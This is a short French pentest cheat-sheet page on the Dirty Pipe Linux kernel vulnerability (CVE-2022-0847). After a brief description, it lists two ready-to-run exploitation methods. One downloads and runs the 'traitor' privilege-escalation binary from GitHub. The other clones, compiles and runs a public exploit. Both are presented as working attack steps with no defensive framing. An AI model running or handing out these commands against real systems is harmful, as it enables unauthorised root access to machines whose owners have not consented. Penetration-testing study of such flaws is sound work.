CVE-2022-0847 (Dirty Pipe)

Dirty Pipe est une vulnérabilité du noyau Linux depuis la version 5.8 qui permet d'écraser des données dans des fichiers arbitraires en lecture seule. Cela conduit à une élévation des privilèges car les processus non privilégiés peuvent injecter du code dans les processus racine.

ressource: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

Exploitation

Méthode 1

# Téléchargement de l'executable ELF
wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
# Don des droits nécessaires à l'execution de l'executable
chmod 777 traitor-amd64
# Exploitation
./traitor-amd64 --exploit kernel:CVE-2022-0847

Méthode 2:

# Téléchargement du script
git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
cd CVE-2022-0847-DirtyPipe-Exploit
./compile.sh
# Exploitation
./exploit

PrécédentLinux SuivantCVE 2021-4034 (PwnKit)

Dernière mise à jour il y a 2 ans